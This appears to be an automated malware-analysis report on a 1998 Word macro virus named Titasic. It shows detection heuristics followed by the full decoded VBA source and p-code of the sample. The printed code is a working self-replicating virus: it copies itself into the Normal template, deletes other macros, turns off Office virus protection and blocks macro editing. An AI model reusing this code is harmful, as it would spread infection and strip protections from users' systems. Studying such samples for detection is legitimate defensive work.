MALICIOUS
256
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
The sample exhibits characteristics of a legacy macro virus, with both WordBasic and VBA macros detected. The presence of AutoOpen and Auto_Close macros, along with the ClamAV detections 'Doc.Trojan.Mamm-1' and 'Doc.Trojan.Titasic-1', strongly suggests malicious intent. The VBA script attempts to copy itself and modify the Normal template, indicating a likely goal of establishing persistence or distributing further malicious content.
Heuristics 6
-
ClamAV: Doc.Trojan.Mamm-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Mamm-1
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATIONVBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.Matched line in script
nmak.CodeModule.DeleteLines 1, nmak.CodeModule.CountOfLines -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
AutoOpen -
Auto_Close macro low OLE_VBA_AUTOCLOSEAuto_Close macroMatched line in script
Sub AutoClose() -
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUSOLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 34818 bytes |
SHA-256: 125f71c69f974fd11225faeecf1fc92814c43a9187d6fc4cbd8c92ab70dc024e |
|||
|
Detection
ClamAV:
Doc.Trojan.Titasic-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "astia"
Public AD As Object, aDes As Variant
Public NonTitasic As Boolean, afound As Boolean, hapus As Boolean, reset As Boolean, aExc As Boolean, DocCount As Boolean
Function AstMaster()
Dim nmak(1) As String
Dim NT As Object
Dim aSrc$
On Error GoTo selesai
nmak(0) = "astia"
nmak(1) = "TITASIC"
aSrc = MacroContainer
Set NT = NormalTemplate
If Not DocCount Then
Set AD = ActiveDocument
ElseIf aSrc <> "SNrml.dot" Then
aSrc = NT
End If
If aSrc = NT Then
aSrc = NT.FullName: Set aDes = AD
ElseIf aSrc = AD Then
aSrc = AD.FullName: Set aDes = NT
ElseIf aSrc = "SNrml.dot" Then
Set aDes = NT
aSrc = Options.DefaultFilePath(8) & "\SNrml.src"
End If
Mhapus aDes
With aDes.VBProject
If Not (Not hapus And .Description = "astia" And .VBComponents.Count > 2) Then
Mcopy aSrc, aDes, nmak
hapus = False
.Description = "astia"
If aDes = NT Then
Options.SaveInterval = 1
CustomizationContext = NT
CommandBars("Tools").reset
KeyBindings.Add KeyCode:=BuildKeyCode(77, 1024), KeyCategory:=1, _
Command:="ToolsRecordMacroStart"
aDes.Save
End If
CommandBars("Macro").Controls(2).OnAction = "ViewVbCode"
Else
GoTo Aksi
End If
End With
If afound = True Then Exit Function
Refresh
On Error Resume Next
Aksi:
If aExc = True Then Exit Function
Exit Function
selesai:
If Err.Number = 50289 Then MsgBox "Terimakasih Anda Telah" & Chr(13) & "Memproteksi Word dengan Aman", vbInformation, "Titasic"
End Function
Sub Mhapus(Sfile)
Dim nmak As Object
For Each nmak In Sfile.VBProject.VBComponents
If nmak.Name = "NewMacros" Then NonTitasic = True
If nmak.Name <> "ThisDocument" And nmak.Name <> "NewMacros" _
And nmak.Name <> "astia" And nmak.Name <> "TITASIC" Then
hapus = True
If reset Then
Application.OrganizerDelete Sfile.FullName, nmak.Name, 3
Else
nmak.CodeModule.DeleteLines 1, nmak.CodeModule.CountOfLines
End If
End If
Next nmak
End Sub
Sub Mcopy(Sfile, Dfile, nmak)
Dim aNmak
For Each aNmak In nmak
Application.OrganizerCopy Sfile, Dfile.FullName, aNmak, 3
Next
End Sub
Sub Action()
Documents.Add
On Error Resume Next
With ActiveWindow
.Caption = "Titasic"
.ActivePane.View.Zoom.Percentage = 100
.View.FullScreen = Not .View.FullScreen
.DisplayRulers = False
.DisplayHorizontalScrollBar = False
.DisplayVerticalRuler = False
.DisplayVerticalScrollBar = False
.View.ShowTextBoundaries = False
CommandBars("Full Screen").Position = 1
With CommandBars("Full Screen").Controls(1)
.Caption = "Titasic," & " " & Date
.Style = 3
.FaceId = 281
End With
.View.Type = 6
Randomize
With ActiveDocument.Background.Fill
.Visible = True
.PresetGradient Int((6 - 1 + 1) * Rnd + 1), 1, Int((24 - 1 + 1) * Rnd + 1)
End With
TITASIC.Show
.View.FullScreen = Not .View.FullScreen
End With
CommandBars("Full Screen").reset
WBT
ActiveDocument.Close 0
WBF
End Sub
Sub FileOpen()
WBT
If Dialogs(80).Show <> 0 Then
WBF
AutoOpen
Else
WBF
End If
End Sub
Sub AutoOpen()
Application.EnableCancelKey = wdCancelDisabled
AstMaster
If Documents.Count > 1 Then
For i = 1 To Documents.Count
If Documents(i).Name <> ActiveDocument.Name Then
Set AD = Documents(i)
DocCount = True
hapus = False
AstMaster
End If
Next
End If
If Now > DateSerial(1998, 9, 15) Then Application.OnTime When:=Now + TimeValue("00:45:00"), Name:="astia.Action"
End
End Sub
Sub ViewVbCode()
If MsgBox("Maaf.." & Chr(13) & "Anda jangan coba-coba mengedit, merubah, ataupun menghapus makro Titasic..!!" & Chr(13) & Chr(13) _
& "Anda hanya bisa merekam makro, menyimpan, menggunakan" & Chr(13) & "serta menghapus makro buatan Anda" & Chr(13) & Chr(13) & " Apakah Anda ingin merekam makro..?", vbExclamation + vbYesNo, "Titasic") _
= vbYes Then SendKeys "%m%s{down}~%d'Macro non-Titasic'%m"
End Sub
Sub AutoExec()
On Error Resume Next
If MacroContainer <> NormalTemplate Then
aExc = True
AstMaster
WBT
AddIns.Unload False
WBF
End If
Application.EnableCancelKey = wdCancelDisabled
End Sub
Sub AutoExit()
Dim aAddin As Object
On Error GoTo batal
WBT
If Documents.Count <> 0 Then Documents.Close
Options.DefaultFilePath(2) = Options.DefaultFilePath(6)
afound = True
For Each aAddin In AddIns
If aAddin.Name = "SNrml.dot" Then afound = False
Next aAddin
If afound = True Then
Application.Visible = False
Documents.Add
AstMaster
With ActiveDocument
.SaveAs FileName:=Options.DefaultFilePath(8) & "\SNrml.src", FileFormat:=wdFormatDocument, AddToRecentFiles:=False
.SaveAs FileName:=Options.DefaultFilePath(8) & "\SNrml.dot", FileFormat:=wdFormatTemplate, AddToRecentFiles:=False
End With
End If
Application.Quit
batal:
WBF
End Sub
Sub ToolsMacro()
WBF
On Error GoTo batal
Mhapus ActiveDocument
If NonTitasic Then
If MacroContainer = ActiveDocument Then Application.Run NormalTemplate.VBProject.Name & ".astia.ToolsMacro": Exit Sub
Application.DisplayAlerts = 0
With Dialogs(215)
.Description = "Macros Titasic mungkin tidak bisa Anda hapus, Anda hanya bisa menghapus makro buatan Anda (Descr: 'Makro non-Titasic')"
If .Display = 1 Then .Execute
End With
Application.DisplayAlerts = -1
Else
ViewVbCode
End If
batal:
End Sub
Sub FileTemplates()
WBF
If Not reset Then Dialogs(87).Display
End Sub
Sub FormatStyle()
WBF
Dialogs(180).Show
End Sub
Function Refresh()
reset = True
FileTemplates
Mhapus aDes
End Function
Sub AutoClose()
Application.DisplayAlerts = -1
With Options
.SaveNormalPrompt = False
.SaveInterval = 10
.VirusProtection = False
End With
If ActiveWindow.Caption <> "Titasic" And InStr(1, ActiveDocument.Name, "Docume", 1) = 0 _
And ActiveDocument.Name <> "SNrml.dot" Then AstMaster
End Sub
Sub FileExit()
AutoExit
End Sub
Sub ToolsOptions()
Options.DefaultFilePath(wdUserTemplatesPath) = "C:\Program Files\Microsoft Office\Templates"
Dialogs(wdDialogToolsOptions).Show
Options.DefaultFilePath(wdUserTemplatesPath) = Application.Path
End Sub
Function WBT()
WordBasic.disableautomacros True
End Function
Function WBF()
WordBasic.disableautomacros False
End Function
Attribute VB_Name = "TITASIC"
Dim Teks(4) As String
Private Sub CommandButton1_Click()
Do
With TITASIC
.Height = .Height - 10
.Width = .Width - 15
If .Height < 25 Then Exit Do
End With
Beep
Loop
Unload Me
End Sub
Private Sub UserForm_Activate()
TT
End Sub
Sub TT()
Dim a As Byte, diam As Boolean
Dim tp&, tm!, sel!, i%
a = 1
diam = True
TITASIC.Enabled = False
Do
DoEvents
sel = Timer - tm
tp = tp + 1
If tp Mod 300 = 0 Then
Label4.ForeColor = TITASIC.BackColor
End If
If tp Mod 600 = 0 Then
Label4.ForeColor = &H80000009
End If
If sel > 0.1 Then
tm = Timer
i = i + 1
If a = 4 Then Label1.Font.Size = 16: Label1.Width = Image1.Width
Label1.Caption = Label1.Caption & Mid(Teks(a), i, 1)
If Mid(Teks(a), i, 1) Like "[! ]" Then Beep
If Len(Label1.Caption) = Len(Teks(a)) Then
If diam Then
Do
If Timer - tm > 1 Then Exit Do
DoEvents
Label4.ForeColor = TITASIC.BackColor
Loop
diam = False
If a = 4 Then GoTo catat
End If
Label2.Move Label2.Left - 9
If Label2.Left <= Label1.Left Then GoSub catat
End If
End If
Loop
Exit Sub
catat:
If a <> 5 Then Label1.Caption = ""
tm = Timer
Label2.Left = Label1.Left + Label1.Width
a = a + 1
i = 0
diam = True
If a = 5 Then
Label4.Visible = False
Frame1.Visible = True
Image1.Visible = True
TITASIC.Enabled = True
CommandButton1.SetFocus
Image1.Picture = LoadPicture(System.PrivateProfileString("", _
"HKEY_CURRENT_USER\Control Panel\desktop", "Wallpaper"))
Exit Sub
End If
Return
End Sub
Private Sub UserForm_Layout()
Dim waktu%, shalat$
waktu = Val(Format(Time, "hh"))
Select Case waktu
Case 12 To 14
shalat = "DZUHUR"
Case 15 To 17
shalat = "ASHAR"
Case 18 To 18
shalat = "MAGHRIB"
Case 19 To 23
shalat = "ISYA"
Case 0 To 2
shalat = "ISYA"
Case 5 To 5
shalat = "SUBUH"
Case Else
Label4.Visible = False
End Select
Teks(1) = "Mungkin kehadiran TITASIC mengganggu kesibukan Anda, untuk itu maafkanlah kelancangan Titasic .."
Teks(2) = "Ingat...!! Radiasi komputer berbahaya bagi Anda! So.. istirahatlah sejenak biar enggak stres, pusing, uring-uringan, dsb..!"
Teks(3) = "Buat Cewek 'SINGLE' yang merasa dirinya Cakeup & Manis.., Salam dari Astia..!"
Teks(4) = "Mangga bilih bade didamel deui.!"
Label2.Left = Label1.Left + Label1.Width
Label3.Caption = "By : Astia '98" & Chr(13) & Chr(13) & "Thanks to : " & Chr(13) & Application.UserName
Label4.Caption = "Anda Sudah Shalat " & shalat & "!"
End Sub
Private Sub UserForm_Terminate()
Dim i As Integer
For i = 1 To 100
Beep
Next
End Sub
' Processing file: /tmp/qstore_xw2y00gu
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 1120 bytes
' Macros/VBA/astia - 12519 bytes
' Line #0:
' Dim (Public)
' VarDefn AD (As Object)
' VarDefn aDes (As Variant)
' Line #1:
' Dim (Public)
' VarDefn NonTitasic (As Boolean)
' VarDefn afound (As Boolean)
' VarDefn hapus (As Boolean)
' VarDefn reset (As Boolean)
' VarDefn aExc (As Boolean)
' VarDefn DocCount (As Boolean)
' Line #2:
' FuncDefn (Function AstMaster())
' Line #3:
' Dim
' OptionBase
' LitDI2 0x0001
' VarDefn nmak (As String)
' Line #4:
' Dim
' VarDefn NT (As Object)
' Line #5:
' Dim
' VarDefn aSrc
' Line #6:
' OnError selesai
' Line #7:
' LitStr 0x0005 "astia"
' LitDI2 0x0000
' ArgsSt nmak 0x0001
' Line #8:
' LitStr 0x0007 "TITASIC"
' LitDI2 0x0001
' ArgsSt nmak 0x0001
' Line #9:
' Line #10:
' Ld MacroContainer
' St aSrc
' Line #11:
' SetStmt
' Ld NormalTemplate
' Set NT
' Line #12:
' Ld DocCount
' Not
' IfBlock
' Line #13:
' SetStmt
' Ld ActiveDocument
' Set AD
' Line #14:
' Ld aSrc
' LitStr 0x0009 "SNrml.dot"
' Ne
' ElseIfBlock
' Line #15:
' Ld NT
' St aSrc
' Line #16:
' EndIfBlock
' Line #17:
' Line #18:
' Ld aSrc
' Ld NT
' Eq
' IfBlock
' Line #19:
' Ld NT
' MemLd FullName
' St aSrc
' BoS 0x0000
' SetStmt
' Ld AD
' Set aDes
' Line #20:
' Ld aSrc
' Ld AD
' Eq
' ElseIfBlock
' Line #21:
' Ld AD
' MemLd FullName
' St aSrc
' BoS 0x0000
' SetStmt
' Ld NT
' Set aDes
' Line #22:
' Ld aSrc
' LitStr 0x0009 "SNrml.dot"
' Eq
' ElseIfBlock
' Line #23:
' SetStmt
' Ld NT
' Set aDes
' Line #24:
' LitDI2 0x0008
' Ld Options
' ArgsMemLd DefaultFilePath 0x0001
' LitStr 0x000A "\SNrml.src"
' Concat
' St aSrc
' Line #25:
' EndIfBlock
' Line #26:
' Line #27:
' Ld aDes
' ArgsCall Mhapus 0x0001
' Line #28:
' StartWithExpr
' Ld aDes
' MemLd VBProject
' With
' Line #29:
' Ld hapus
' Not
' MemLdWith Description
' LitStr 0x0005 "astia"
' Eq
' And
' MemLdWith VBComponents
' MemLd Count
' LitDI2 0x0002
' Gt
' And
' Paren
' Not
' IfBlock
' Line #30:
' Ld aSrc
' Ld aDes
' Ld nmak
' ArgsCall Mcopy 0x0003
' Line #31:
' LitVarSpecial (False)
' St hapus
' Line #32:
' LitStr 0x0005 "astia"
' MemStWith Description
' Line #33:
' Ld aDes
' Ld NT
' Eq
' IfBlock
' Line #34:
' LitDI2 0x0001
' Ld Options
' MemSt SaveInterval
' Line #35:
' Ld NT
' St CustomizationContext
' Line #36:
' LitStr 0x0005 "Tools"
' ArgsLd CommandBars 0x0001
' ArgsMemCall reset 0x0000
' Line #37:
' LineCont 0x0004 10 00 08 00
' LitDI2 0x004D
' LitDI2 0x0400
' ArgsLd BuildKeyCode 0x0002
' ParamNamed KeyCode
' LitDI2 0x0001
' ParamNamed KeyCategory
' LitStr 0x0015 "ToolsRecordMacroStart"
' ParamNamed Command
' Ld KeyBindings
' ArgsMemCall Add 0x0003
' Line #38:
' Ld aDes
' ArgsMemCall Save 0x0000
' Line #39:
' EndIfBlock
' Line #40:
' LitStr 0x000A "ViewVbCode"
' LitDI2 0x0002
' LitStr 0x0005 "Macro"
' ArgsLd CommandBars 0x0001
' ArgsMemLd Controls 0x0001
' MemSt OnAction
' Line #41:
' ElseBlock
' Line #42:
' GoTo Aksi
' Line #43:
' EndIfBlock
' Line #44:
' EndWith
' Line #45:
' Ld afound
' LitVarSpecial (True)
' Eq
' If
' BoSImplicit
' ExitFunc
' EndIf
' Line #46:
' ArgsCall Refresh 0x0000
' Line #47:
' OnError (Resume Next)
' Line #48:
' Label Aksi
' Line #49:
' Ld aExc
' LitVarSpecial (True)
' Eq
' If
' BoSImplicit
' ExitFunc
' EndIf
' Line #50:
' ExitFunc
' Line #51:
' Label selesai
' Line #52:
' Ld Err
' MemLd Number
' LitDI4 0xC471 0x0000
' Eq
' If
' BoSImplicit
' LitStr 0x0016 "Terimakasih Anda Telah"
' LitDI2 0x000D
' ArgsLd Chr 0x0001
' Concat
' LitStr 0x001C "Memproteksi Word dengan Aman"
' Concat
' Ld vbInformation
' LitStr 0x0007 "Titasic"
' ArgsCall MsgBox 0x0003
' EndIf
' Line #53:
' EndFunc
' Line #54:
' Line #55:
' FuncDefn (Sub Mhapus(Sfile))
' Line #56:
' Dim
' VarDefn nmak (As Object)
' Line #57:
' StartForVariable
' Ld nmak
' EndForVariable
' Ld Sfile
' MemLd VBProject
' MemLd VBComponents
' ForEach
' Line #58:
' Ld nmak
' MemLd New
' LitStr 0x0009 "NewMacros"
' Eq
' If
' BoSImplicit
' LitVarSpecial (True)
' St NonTitasic
' EndIf
' Line #59:
' LineCont 0x0004 0C 00 04 00
' Ld nmak
' MemLd New
' LitStr 0x000C "ThisDocument"
' Ne
' Ld nmak
' MemLd New
' LitStr 0x0009 "NewMacros"
' Ne
' And
' Ld nmak
' MemLd New
' LitStr 0x0005 "astia"
' Ne
' And
' Ld nmak
' MemLd New
' LitStr 0x0007 "TITASIC"
' Ne
' And
' IfBlock
' Line #60:
' LitVarSpecial (True)
' St hapus
' Line #61:
' Ld reset
' IfBlock
' Line #62:
' Ld Sfile
' MemLd FullName
' Ld nmak
' MemLd New
' LitDI2 0x0003
' Ld Application
' ArgsMemCall OrganizerDelete 0x0003
' Line #63:
' ElseBlock
' Line #64:
' LitDI2 0x0001
' Ld nmak
' MemLd CodeModule
' MemLd CountOfLines
' Ld nmak
' MemLd CodeModule
' ArgsMemCall DeleteLines 0x0002
' Line #65:
' EndIfBlock
' Line #66:
' EndIfBlock
' Line #67:
' StartForVariable
' Ld nmak
' EndForVariable
' NextVar
' Line #68:
' EndSub
' Line #69:
' FuncDefn (Sub Mcopy(Sfile, Dfile, nmak))
' Line #70:
' Dim
' VarDefn aNmak
' Line #71:
' StartForVariable
' Ld aNmak
' EndForVariable
' Ld nmak
' ForEach
' Line #72:
' Ld Sfile
' Ld Dfile
' MemLd FullName
' Ld aNmak
' LitDI2 0x0003
' Ld Application
' ArgsMemCall OrganizerCopy 0x0004
' Line #73:
' StartForVariable
' Next
' Line #74:
' EndSub
' Line #75:
' FuncDefn (Sub Action())
' Line #76:
' Ld Documents
' ArgsMemCall Add 0x0000
' Line #77:
' OnError (Resume Next)
' Line #78:
' StartWithExpr
' Ld ActiveWindow
' With
' Line #79:
' LitStr 0x0007 "Titasic"
' MemStWith Caption
' Line #80:
' LitDI2 0x0064
' MemLdWith ActivePane
' MemLd View
' MemLd Zoom
' MemSt Percentage
' Line #81:
' MemLdWith View
' MemLd FullScreen
' Not
' MemLdWith View
' MemSt FullScreen
' Line #82:
' LitVarSpecial (False)
' MemStWith DisplayRulers
' Line #83:
' LitVarSpecial (False)
' MemStWith DisplayHorizontalScrollBar
' Line #84:
' LitVarSpecial (False)
' MemStWith DisplayVerticalRuler
' Line #85:
' LitVarSpecial (False)
' MemStWith DisplayVerticalScrollBar
' Line #86:
' LitVarSpecial (False)
' MemLdWith View
' MemSt ShowTextBoundaries
' Line #87:
' LitDI2 0x0001
' LitStr 0x000B "Full Screen"
' ArgsLd CommandBars 0x0001
' MemSt Position
' Line #88:
' StartWithExpr
' LitDI2 0x0001
' LitStr 0x000B "Full Screen"
' ArgsLd CommandBars 0x0001
' ArgsMemLd Controls 0x0001
' With
' Line #89:
' LitStr 0x0008 "Titasic,"
' LitStr 0x0002 " "
' Concat
' Ld Date
' Concat
' MemStWith Caption
' Line #90:
' LitDI2 0x0003
' MemStWith Style
' Line #91:
' LitDI2 0x0119
' MemStWith FaceId
' Line #92:
' EndWith
' Line #93:
' LitDI2 0x0006
' MemLdWith View
' MemSt TypeOf
' Line #94:
' ArgsCall Read 0x0000
' Line #95:
' StartWithExpr
' Ld ActiveDocument
' MemLd Background
' MemLd Fill
' With
' Line #96:
' LitVarSpecial (True)
' MemStWith Visible
' Line #97:
' LitDI2 0x0006
' LitDI2 0x0001
' Sub
' LitDI2 0x0001
' Add
' Paren
' Ld Rnd
' Mul
' LitDI2 0x0001
' Add
' FnInt
' LitDI2 0x0001
' LitDI2 0x0018
' LitDI2 0x0001
' Sub
' LitDI2 0x0001
' Add
' Paren
' Ld Rnd
' Mul
' LitDI2 0x0001
' Add
' FnInt
' ArgsMemCallWith PresetGradient 0x0003
' Line #98:
' EndWith
' Line #99:
' Ld TITASIC
' ArgsMemCall Show 0x0000
' Line #100:
' MemLdWith View
' MemLd FullScreen
' Not
' MemLdWith View
' MemSt FullScreen
' Line #101:
' EndWith
' Line #102:
' LitStr 0x000B "Full Screen"
' ArgsLd CommandBars 0x0001
' ArgsMemCall reset 0x0000
' Line #103:
' ArgsCall WBT 0x0000
' Line #104:
' LitDI2 0x0000
' Ld ActiveDocument
' ArgsMemCall Close 0x0001
' Line #105:
' ArgsCall WBF 0x0000
' Line #106:
' EndSub
' Line #107:
' FuncDefn (Sub FileOpen())
' Line #108:
' ArgsCall WBT 0x0000
' Line #109:
' LitDI2 0x0050
' ArgsLd Dialogs 0x0001
' MemLd Show
' LitDI2 0x0000
' Ne
' IfBlock
' Line #110:
' ArgsCall WBF 0x0000
' Line #111:
' ArgsCall AutoOpen 0x0000
' Line #112:
' ElseBlock
' Line #113:
' ArgsCall WBF 0x0000
' Line #114:
' EndIfBlock
' Line #115:
' EndSub
' Line #116:
' Line #117:
' FuncDefn (Sub AutoOpen())
' Line #118:
' Ld wdCancelDisabled
' Ld Application
' MemSt EnableCancelKey
' Line #119:
' ArgsCall AstMaster 0x0000
' Line #120:
' Ld Documents
' MemLd Count
' LitDI2 0x0001
' Gt
' IfBlock
' Line #121:
' StartForVariable
' Ld i
' EndForVariable
' LitDI2 0x0001
' Ld Documents
' MemLd Count
' For
' Line #122:
' Ld i
' ArgsLd Documents 0x0001
' MemLd New
' Ld ActiveDocument
' MemLd New
' Ne
' IfBlock
' Line #123:
' SetStmt
' Ld i
' ArgsLd Documents 0x0001
' Set AD
' Line #124:
' LitVarSpecial (True)
' St DocCount
' Line #125:
' LitVarSpecial (False)
' St hapus
' Line #126:
' ArgsCall AstMaster 0x0000
' Line #127:
' EndIfBlock
' Line #128:
' StartForVariable
' Next
' Line #129:
' EndIfBlock
' Line #130:
' Ld Now
' LitDI2 0x07CE
' LitDI2 0x0009
' LitDI2 0x000F
' ArgsLd DateSerial 0x0003
' Gt
' If
' BoSImplicit
' Ld Now
' LitStr 0x0008 "00:45:00"
' ArgsLd TimeValue 0x0001
' Add
…
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.